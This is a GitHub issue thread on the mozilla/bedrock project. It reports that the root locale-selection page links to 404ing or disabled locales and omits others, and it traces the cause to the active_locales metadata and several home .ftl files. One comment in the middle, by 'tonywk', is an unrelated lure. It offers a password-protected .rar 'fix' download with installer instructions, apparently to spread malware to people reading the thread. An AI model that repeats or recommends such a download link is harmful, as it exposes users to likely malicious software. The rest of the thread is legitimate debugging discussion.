### ISSUE TITLE
Only link to working locales from canonical meta and / site root

### ISSUE THREAD

**Issue by janbrasna** [mozilla/bedrock#15010]
## Description

_Originally posted by @janbrasna in https://github.com/mozilla/bedrock/issues/15007#issuecomment-2307878098:_
> "The offered languages, esp. from the bot/baseline root page, should all be working. I've found some in prod that link to 404 — e.g. Tadjik (Тоҷикӣ) [/tg](https://www.mozilla.org/tg/) is being offered there, but not working."

### Steps to reproduce

Open https://www.mozilla.org/ with Accept-Language header empty to get to the locale selection page (i.e. [this](https://web.archive.org/web/20240521000647/https://www.mozilla.org/) from crawlers PoV), and check all the links work.

(Canonical meta hrefs for / home seems to all be to active and working locales.)

### Expected result

Only working locales linked.

### Actual result

https://www.mozilla.org/ach › default fallback
https://www.mozilla.org/lo › /en-US/lo/ 404
https://www.mozilla.org/mk › default fallback
https://www.mozilla.org/km › default fallback
https://www.mozilla.org/tg › /en-US/tg/ 404
https://www.mozilla.org/tl › default fallback

### Environment

Overrides with googlebot UA string, empty Accept-Locale etc.

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by janbrasna** [comment]
For now it seems that the `active_locales` for root page (that are then offered as the languages available for the home page translation) are taken from `metadata/404.json` instead of say e.g. `metadata/mozorg/home.json` — either by the fact it's the first file in the folder, or that's the actual page that serves the root?

Compare `./manage.py active_locales mozorg/home` (expected locales)
to `./manage.py active_locales 404` (that are in reality used for the home root links)

Basically none of the root language selection gets filtered to PROD_LANGUAGES or DEV_LANGUAGES, only to locale map from product-details, otherwise anything that's in the metadata json as active_locale gets exposed all the way through.

**Comment by janbrasna** [comment]
Actually not only there are disabled languages being offered. There are also a handful missing: https://www.textcompare.org/?id=66cf6c8bba091793598346ea

![Screenshot 2024-08-28 at 20 30 57](https://github.com/user-attachments/assets/fb624520-d3e9-4154-bf04-530089ea9165)

(full diff in the link, but basically some European and Asian languages like _az, bg, et, gu, hy, lt, ta, ur_ missing.)

1. So for this root page to correctly reflect the available locales for homepage (i.e. those that would be alternate hreflangs for /en-US/ and are correctly offered there), this root has to list active_locales not for its request, but for mozorg/home.ftl instead.
2. Also to avoid providing broken links in case there are active_locales that are however not allowed in PROD_LANGUAGES, a filter to only allow PROD_LANGUAGES needs to be added.

**Comment by janbrasna** [comment]
This is getting a bit complicated now with three home ftls:

1. `mozorg/home-m24.ftl`
2. `mozorg/home-new.ftl`
3. `mozorg/home.ftl`

with varying activation metadata.

Normally a "good enough" check might be for the activation of the oldest `home.ftl` file for home-old (`?xv=legacy`) that is the "lowest common denominator" fallback if nothing better exists, however this is not 100% correct:

A corner case might be e.g. a locale that never had home-old or home-new translated, but got active recently and completed home-m24 localization — such language should also be listed in the global root as active.
